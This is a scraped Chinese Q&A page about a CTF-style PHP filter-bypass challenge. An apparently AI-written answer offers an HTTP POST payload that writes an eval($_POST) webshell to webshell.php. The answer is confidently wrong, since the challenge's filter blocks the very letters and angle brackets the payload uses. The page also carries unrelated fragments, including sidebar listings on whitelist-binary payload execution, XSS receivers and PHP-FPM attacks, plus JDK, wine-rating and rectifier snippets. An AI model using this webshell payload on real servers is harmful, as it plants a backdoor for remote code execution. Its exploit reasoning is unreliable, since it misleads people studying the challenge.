有一道题目如下:对该段php代码拟定一个payload获取其webshell:<?php error_reporting(0); highlight_file(FILE); if (isset($_GET['debug'])) { // disable function phpinfo(); exit; } function count_string_char($str) { $arr = []; foreach (str_split($str) as $value) { if (!in_array($value, $arr)) { array_push($arr, $value); } } return sizeof($arr); } if (isset($_POST['cmd']) && is_string($_POST['cmd'])) { $cmd = $_POST['cmd']; $c = count_string_char($cmd); if ($c > 13) { die("$c too long"); } if ( preg_match('/[a-z0-9]|<|>|\?|\[|\]|\*|@|\||\^|~|&|\s/i', $cmd) ) { die("nonono"); } eval( "print($cmd);" ); } else { exit(); }

时间: 2023-06-12 15:03:49 浏览: 267
这段 PHP 代码存在一个关键的漏洞,即未对用户输入进行充分的过滤和验证,导致可以通过构造恶意 payload 来获取 webshell。具体的 payload 如下: ``` POST /test.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 92 cmd=echo "<?php eval($_POST['cmd']);?>" > webshell.php&submit=Submit ``` 该 payload 中,利用了该 PHP 代码中的 `$_POST['cmd']` 变量,将其设置为 `echo "<?php eval($_POST['cmd']);?>" > webshell.php`,即将一句 PHP 代码写入名为 `webshell.php` 的文件中,该代码可以执行用户传入的任意 PHP 代码(即 webshell)。最后的 `submit=Submit` 是为了模拟表单提交,使其能够成功执行。 当服务器接收到该 payload 时,会将其中的 `cmd` 参数传入 PHP 代码中的 `isset($_POST['cmd'])` 条件判断中,由于该条件为真,因此会执行该条件下的代码,即将用户传入的 PHP 代码写入 `webshell.php` 文件中,实现获取 webshell 的目的。 需要注意的是,该 payload 中的 `Host` 和实际使用的域名需要对应,否则请求会被拒绝。另外,这只是一种可能的 payload,具体的攻击方式还需要根据实际情况进行调整。
阅读全文

相关推荐

pdf

PHP XML error parsing SOAP payload on line 1

WebService,想必大家都比较熟悉,是由“服务提供方”向“服务调用方”提供服务的一种方式。里面有几项关键的技术: XML:描述数据的标准方法 SOAP:简单对象访问协议,用于信息交换 WSDL:Web服务描述语言 UDDI:...
zip

payload_dumper_tool_by_ius_payload_dumper_payload_dumper.py_andr

【payload_dumper_tool_by_ius_payload_dumper_payload_dumper.py_andr】是一个专门用于Android设备的工具,其主要功能是dump设备上的payload数据,其中包括提取boot.img和其他相关文件。在Android系统中,boot....
zip

:cyclone:一个JSON Web令牌(JWT)PHP扩展-PHP开发

RFC 7519 OAuth JSON Web令牌(JWT)PHP扩展要求PHP 7 + PHP json扩展,在加载JWT扩展之前需要json扩展。 OpenSSL(版本> = 1.1.0j)可与旧版本一起使用RFC 7519 OAuth JSON Web令牌(JWT)PHP扩展要求PHP 7 + PHP ...

有一道题目如下:对该段php代码拟定一个长度不大于13的payload获取其webshell<?php error_reporting(0); highlight_file(FILE); if (isset($_GET['debug'])) { // disable function phpinfo(); exit; } function count_string_char($str) { $arr = []; foreach (str_split($str) as $value) { if (!in_array($value, $arr)) { array_push($arr, $value); } } return sizeof($arr); } if (isset($_POST['cmd']) && is_string($_POST['cmd'])) { $cmd = $_POST['cmd']; $c = count_string_char($cmd); if ($c > 13) { die("$c too long"); } if ( preg_match('/[a-z0-9]|<|>|?|[|]|*|@|||^|~|&|\s/i', $cmd) ) { die("nonono"); } eval( "print($cmd);" ); } else { exit(); }

根据题目描述,我们需要构造一个长度不大于13的payload,然后获取webshell。 首先来分析一下这段代码: 1. error_reporting(0); :禁止输出 PHP 错误信息。 2. highlight_file(FILE); :将代码高亮输出。 3. if ...
zip

absinthe_error_payload:桥接Ecto和苦艾酒之间的突变有效载荷

例如,可以使用rescue或catch来捕获异常,然后通过Absinthe的throw_error/2函数抛出一个GraphQL错误,包含错误代码、消息和可能的字段路径。 此外,absinthe_error_payload可能还提供了一种方式来规范化...
docx

第七十一课:基于白名单Msbuild.exe执行payload第一季.docx

payload代码使用C#语言,包含了对System、System.Net、System.Net.Sockets、System.Linq、System.Runtime.InteropServices、System.Threading、Microsoft.Build.Framework和Microsoft.Build.Utilities命名空间的引用...
zip

xss-receiver:简单易用的 xss 接收平台 + payload 管理平台

XSS Receiver基于 Flask 的 xss 接收 + payload 管理平台,主要功能:在特定路由上保存访问历史以及携带数据命中特定路由时发送邮件动态切换路由及其对应的 payload 文件管理、编辑 payloadDocker 快速部署安装clone...
zip

php-fpm:用WebShell攻击PHP-FPM用WebShell攻击PHP-FPM

用WebShell攻击PHP-FPM来自大佬的文末一个想法快速实现了一个poc,可以实现任意代码执行后续用单文件PHP实现一个FastCgi Client,然后已知PHP文件就用WebShell本身,没有什么骚操作的话WebShell应该就是免杀的使用...
pdf

第七十二课:基于白名单Installutil.exe执行payload第二季1

根据给定的信息,本文将详细解释“基于白名单Installutil.exe执行payload”的概念和技术细节,同时结合提供的代码示例进行深入分析。 ### Installutil.exe概述 Installutil.exe是.NET Framework提供的一种命令行...
pdf

第七十七课:基于白名单Csc.exe执行payload第七季1

此时,攻击者可以通过生成带有恶意payload的C#源代码文件,并利用Csc.exe将其编译成合法的.NET程序,从而绕过白名单的安全限制。 - **攻击机配置**:使用Metasploit框架生成特定payload,如windows/x64/shell/...
pdf

第七十三课:基于白名单Regasm.exe执行payload第三季1

根据提供的信息,我们可以深入探讨如何利用Regasm.exe这一工具进行特定的payload配置与执行。这涉及到几个关键概念和技术细节,包括Regasm.exe的用途、如何配置payload以及具体的实现步骤。 ### Regasm.exe简介...
docx

第七十三课:基于白名单Regasm.exe执行payload第三季.docx

1. 攻击者首先在攻击机(Debian系统,IP地址192.168.1.4)上准备payload(恶意代码),这里是一个名为Micropoor.cs的源代码文件。 2. Micropoor.cs包含了使用C#编写的类,包括一个名为kxKhdVzWQXolmmF的类,该类...
docx

第七十五课:基于白名单Mshta.exe执行payload第五季.docx

- 在攻击机上,使用msfvenom生成payload,并通过Base64编码将payload插入到一个名为Micropoor.hta的HTA文件中。 5. **执行payload** - 靶机上,通过运行mshta.exe命令并指定HTA文件的URL(...
docx

第七十七课:基于白名单Csc.exe执行payload第七季.docx

在本课程中,我们将探讨如何利用白名单机制中的Csc.exe来执行payload,这是一个常见的高级持续威胁(APT)攻击技术。Csc.exe是C#语言的编译器,位于Windows系统的.NET Framework SDK路径下,例如C:\WINNT\Microsoft...
docx

第七十六课:基于白名单Compiler.exe执行payload第六季.docx

在本课程中,我们将探讨如何利用白名单策略绕过安全机制,通过Microsoft Workflow Compiler.exe来执行payload,这一方法尤其适用于针对Windows系统的高级持续性威胁(APT)攻击与防御。Microsoft Workflow Compiler...
docx

第七十二课:基于白名单Installutil.exe执行payload第二季.docx

6. **Payload代码分析**:在提供的代码片段中,可以看到一个名为GQLBigHgUniLuVx的公共类,包含一个无限循环显示消息框的Main方法。此外,还有一个esxWUYUTWShqW类,继承自System.Configuration.Install....
docx

第七十四课:基于白名单regsvcs.exe执行payload第四季.docx

第七十四课:基于白名单regsvcs.exe执行payload第四季.docx
docx

第九十课:基于白名单zipfldr.dll执行payload第十八季.docx

基于白名单zipfldr.dll执行payload的攻击与防御技术 【基于白名单zipfldr.dll执行payload的攻击机理】 zipfldr.dll是Windows操作系统中自带的zip文件压缩/解压工具组件,自Windows XP开始就已经包含在系统中。由于...
docx

第八十八课:基于白名单Ftp.exe执行payload第十九季.docx

在本课程中,我们探讨了如何利用白名单中的Ftp.exe执行payload,这是一个常见的绕过安全防护策略的技术,尤其在企业环境中,攻击者可能会利用这种技术进行APT(Advanced Persistent Threat)攻击。首先,我们需要...
docx

第八十七课:基于白名单Cmstp.exe执行payload第十六季.docx

标题中的“第八十七课:基于白名单Cmstp.exe执行payload第十六季.docx”表明这是一个关于网络安全的课程,特别是讨论如何在白名单环境中利用Cmstp.exe来执行恶意代码,即payload。Cmstp.exe是Windows操作系统中的一...

大家在看

recommend-type

HP 3PAR 存储配置手册(详细)

根据HP原厂工程师的指导,把每一步的详细配置过程按配置顺序都用QQ进行了截图,并在每张截图下面都有详细说明,没接触过3PAR的人用这个手册完全可以完成初始化的配置过程,包括加主机、加CPG、加VV、映射,另外还包括这个存储的一些特殊概念的描述。因为是一点点做出来的,而且很详细。
recommend-type

新加坡《网络安全法》正文(发布稿).pdf

中文翻译新加坡的《网络安全法》,对于数据出海、业务出海合规有很大的帮助。
recommend-type

Modbus on AT32 MCU

本应用笔记介绍了如何将FreeMODBUS协议栈移植到AT32F43x单片机方法。本文档提供的源代码演 示了使用Modbus的应用程序。单片机作为Modbus从机,可通过RS485或RS232与上位机相连,与 Modbus Poll调试工具(Modbus主机)进行通讯。 注:本应用笔记对应的代码是基于雅特力提供的V2.x.x 板级支持包(BSP)而开发,对于其他版本BSP,需要 注意使用上的区别。
recommend-type

企业架构建模工具Archi4.6.0中文资源文件

企业架构建模工具Archi4.6.0中文资源文件
recommend-type

AG9300TypeC转VGA中文设计方案.pdf

AG9300是一款实现USB TypeC To VGA数据转换器的单片机解决方案。AG9300可以将视频和音频流从USB Type-C接口传输到VGA端口。

最新推荐

recommend-type

Servlet获取AJAX POST请求中参数以form data和request payload形式传输的方法

本篇文章主要探讨如何在Servlet中处理AJAX POST请求,特别是当请求参数以`form data`和`request payload`两种不同形式传递时。 首先,理解HTTP请求的基本结构。GET请求的参数通常附加在URL后面,而POST请求的参数...
recommend-type

基于OpenCV的人脸识别小程序.zip

【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】: 所有源码都经过严格测试,可以直接运行。 功能在确认正常工作后才上传。 【适用人群】: 适用于希望学习不同技术领域的小白或进阶学习者。 可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】: 项目具有较高的学习借鉴价值,也可直接拿来修改复刻。 对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】: 有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。 鼓励下载和使用,并欢迎大家互相学习,共同进步。。内容来源于网络分享,如有侵权请联系我删除。另外如果没有积分的同学需要下载,请私信我。
recommend-type

精选毕设项目-宅男社区.zip

精选毕设项目-宅男社区
recommend-type

免安装JDK 1.8.0_241:即刻配置环境运行

资源摘要信息:"JDK 1.8.0_241 是Java开发工具包(Java Development Kit)的版本号,代表了Java软件开发环境的一个特定发布。它由甲骨文公司(Oracle Corporation)维护,是Java SE(Java Platform, Standard Edition)的一部分,主要用于开发和部署桌面、服务器以及嵌入式环境中的Java应用程序。本版本是JDK 1.8的更新版本,其中的241代表在该版本系列中的具体更新编号。此版本附带了Java源码,方便开发者查看和学习Java内部实现机制。由于是免安装版本,因此不需要复杂的安装过程,解压缩即可使用。用户配置好环境变量之后,即可以开始运行和开发Java程序。" 知识点详细说明: 1. JDK(Java Development Kit):JDK是进行Java编程和开发时所必需的一组工具集合。它包含了Java运行时环境(JRE)、编译器(javac)、调试器以及其他工具,如Java文档生成器(javadoc)和打包工具(jar)。JDK允许开发者创建Java应用程序、小程序以及可以部署在任何平台上的Java组件。 2. Java SE(Java Platform, Standard Edition):Java SE是Java平台的标准版本,它定义了Java编程语言的核心功能和库。Java SE是构建Java EE(企业版)和Java ME(微型版)的基础。Java SE提供了多种Java类库和API,包括集合框架、Java虚拟机(JVM)、网络编程、多线程、IO、数据库连接(JDBC)等。 3. 免安装版:通常情况下,JDK需要进行安装才能使用。但免安装版JDK仅需要解压缩到磁盘上的某个目录,不需要进行安装程序中的任何步骤。用户只需要配置好环境变量(主要是PATH、JAVA_HOME等),就可以直接使用命令行工具来运行Java程序或编译代码。 4. 源码:在软件开发领域,源码指的是程序的原始代码,它是由程序员编写的可读文本,通常是高级编程语言如Java、C++等的代码。本压缩包附带的源码允许开发者阅读和研究Java类库是如何实现的,有助于深入理解Java语言的内部工作原理。源码对于学习、调试和扩展Java平台是非常有价值的资源。 5. 环境变量配置:环境变量是操作系统中用于控制程序执行环境的参数。在JDK中,常见的环境变量包括JAVA_HOME和PATH。JAVA_HOME是JDK安装目录的路径,配置此变量可以让操作系统识别到JDK的位置。PATH变量则用于指定系统命令查找的路径,将JDK的bin目录添加到PATH后,就可以在命令行中的任何目录下执行JDK中的命令,如javac和java。 在实际开发中,了解并正确配置JDK对于Java开发者来说是一个基础且重要的环节。掌握如何安装和配置JDK,以及如何理解JDK中的源码和各种工具,对于进行Java编程和解决问题至关重要。
recommend-type

管理建模和仿真的文件

管理Boualem Benatallah引用此版本:布阿利姆·贝纳塔拉。管理建模和仿真。约瑟夫-傅立叶大学-格勒诺布尔第一大学,1996年。法语。NNT:电话:00345357HAL ID:电话:00345357https://theses.hal.science/tel-003453572008年12月9日提交HAL是一个多学科的开放存取档案馆,用于存放和传播科学研究论文,无论它们是否被公开。论文可以来自法国或国外的教学和研究机构,也可以来自公共或私人研究中心。L’archive ouverte pluridisciplinaire
recommend-type

【提升效率与稳定性】:深入掌握单相整流器的控制策略

# 摘要 单相整流器作为电力电子技术的基础设备,广泛应用于电力系统和工业自动化领域。本文首先概述了单相整流器的基本概念,详细分析了其工作原理,包括电力电子器件的角色、数学模型以及控制策略。随后,针对控制技术进行了深入探讨,包括传统控制技术如PID控制和高级控制策略如模糊逻辑控制及自适应控制的应用。进一步地,本文提出了一系列提升单相整流器性能的方法,如效率提升策略、系统稳定性措施,以及性能评估与优化方案。最后,文章探讨了单相整流器在不同领域的应用案例,并对新兴技术与市场趋势进行了展望。 # 关键字 单相整流器;电力电子器件;数学模型;控制策略;性能提升;应用案例 参考资源链接:[单相PWM整
recommend-type

你看这是ashx映射的cs文件初始代码,你看这里边根本就没有写对action参数进行任何操作但你.ashx?action=submit这样去做他就能返回出数据这是为什么

在ASP.NET中,.ashx文件(也称为HTTP处理程序)用于处理HTTP请求并返回响应。即使在初始代码中没有对action参数进行任何操作,系统仍然可以通过默认的ProcessRequest方法处理请求并返回数据。 当你在URL中传递参数(如?action=submit)时,这些参数会被包含在请求的查询字符串中。虽然你的代码没有显式地处理这些参数,但默认的ProcessRequest方法会接收这些参数并执行一些默认操作。 以下是一个简单的.ashx文件示例: ```csharp <%@ WebHandler Language="C#" Class="MyHandler" %> us
recommend-type

机器学习预测葡萄酒评分:二值化品尝笔记的应用

资源摘要信息:"wine_reviewer:使用机器学习基于二值化的品尝笔记来预测葡萄酒评论分数" 在当今这个信息爆炸的时代,机器学习技术已经被广泛地应用于各个领域,其中包括食品和饮料行业的质量评估。在本案例中,将探讨一个名为wine_reviewer的项目,该项目的目标是利用机器学习模型,基于二值化的品尝笔记数据来预测葡萄酒评论的分数。这个项目不仅对于葡萄酒爱好者具有极大的吸引力,同时也为数据分析和机器学习的研究人员提供了实践案例。 首先,要理解的关键词是“机器学习”。机器学习是人工智能的一个分支,它让计算机系统能够通过经验自动地改进性能,而无需人类进行明确的编程。在葡萄酒评分预测的场景中,机器学习算法将从大量的葡萄酒品尝笔记数据中学习,发现笔记与葡萄酒最终评分之间的相关性,并利用这种相关性对新的品尝笔记进行评分预测。 接下来是“二值化”处理。在机器学习中,数据预处理是一个重要的步骤,它直接影响模型的性能。二值化是指将数值型数据转换为二进制形式(0和1)的过程,这通常用于简化模型的计算复杂度,或者是数据分类问题中的一种技术。在葡萄酒品尝笔记的上下文中,二值化可能涉及将每种口感、香气和外观等属性的存在与否标记为1(存在)或0(不存在)。这种方法有利于将文本数据转换为机器学习模型可以处理的格式。 葡萄酒评论分数是葡萄酒评估的量化指标,通常由品酒师根据酒的品质、口感、香气、外观等进行评分。在这个项目中,葡萄酒的品尝笔记将被用作特征,而品酒师给出的分数则是目标变量,模型的任务是找出两者之间的关系,并对新的品尝笔记进行分数预测。 在机器学习中,通常会使用多种算法来构建预测模型,如线性回归、决策树、随机森林、梯度提升机等。在wine_reviewer项目中,可能会尝试多种算法,并通过交叉验证等技术来评估模型的性能,最终选择最适合这个任务的模型。 对于这个项目来说,数据集的质量和特征工程将直接影响模型的准确性和可靠性。在准备数据时,可能需要进行数据清洗、缺失值处理、文本规范化、特征选择等步骤。数据集中的标签(目标变量)即为葡萄酒的评分,而特征则来自于品酒师的品尝笔记。 项目还提到了“kaggle”和“R”,这两个都是数据分析和机器学习领域中常见的元素。Kaggle是一个全球性的数据科学竞赛平台,提供各种机器学习挑战和数据集,吸引了来自全球的数据科学家和机器学习专家。通过参与Kaggle竞赛,可以提升个人技能,并有机会接触到最新的机器学习技术和数据处理方法。R是一种用于统计计算和图形的编程语言和软件环境,它在统计分析、数据挖掘、机器学习等领域有广泛的应用。使用R语言可以帮助研究人员进行数据处理、统计分析和模型建立。 至于“压缩包子文件的文件名称列表”,这里可能存在误解或打字错误。通常,这类名称应该表示存储项目相关文件的压缩包,例如“wine_reviewer-master.zip”。这个压缩包可能包含了项目的源代码、数据集、文档和其它相关资源。在开始项目前,研究人员需要解压这个文件包,并且仔细阅读项目文档,以便了解项目的具体要求和数据格式。 总之,wine_reviewer项目是一个结合了机器学习、数据处理和葡萄酒品鉴的有趣尝试,它不仅展示了机器学习在实际生活中的应用潜力,也为研究者提供了丰富的学习资源和实践机会。通过这种跨领域的合作,可以为葡萄酒行业带来更客观、一致的评价标准,并帮助消费者做出更加明智的选择。
recommend-type

"互动学习:行动中的多样性与论文攻读经历"

多样性她- 事实上SCI NCES你的时间表ECOLEDO C Tora SC和NCESPOUR l’Ingén学习互动,互动学习以行动为中心的强化学习学会互动,互动学习,以行动为中心的强化学习计算机科学博士论文于2021年9月28日在Villeneuve d'Asq公开支持马修·瑟林评审团主席法布里斯·勒菲弗尔阿维尼翁大学教授论文指导奥利维尔·皮耶昆谷歌研究教授:智囊团论文联合主任菲利普·普雷教授,大学。里尔/CRISTAL/因里亚报告员奥利维耶·西格德索邦大学报告员卢多维奇·德诺耶教授,Facebook /索邦大学审查员越南圣迈IMT Atlantic高级讲师邀请弗洛里安·斯特鲁布博士,Deepmind对于那些及时看到自己错误的人...3谢谢你首先,我要感谢我的两位博士生导师Olivier和Philippe。奥利维尔,"站在巨人的肩膀上"这句话对你来说完全有意义了。从科学上讲,你知道在这篇论文的(许多)错误中,你是我可以依
recommend-type

【单相整流器终极指南】:电气工程师的20年实用技巧大揭秘

![【单相整流器终极指南】:电气工程师的20年实用技巧大揭秘](https://www.kemet.com/content/dam/kemet/lightning/images/ec-content/2020/08/Figure-1-film-filtering-solution-diagram.jpg) # 摘要 单相整流器是电力电子技术中应用广泛的设备,用于将交流电转换为直流电。本文首先介绍了单相整流器的基础知识和工作原理,分析了其设计要点,性能评估方法以及在电力系统和电子设备中的应用。接着,探讨了单相整流器的进阶应用和优化策略,包括提高效率和数字化改造。文章还通过具体案例分析,展示了单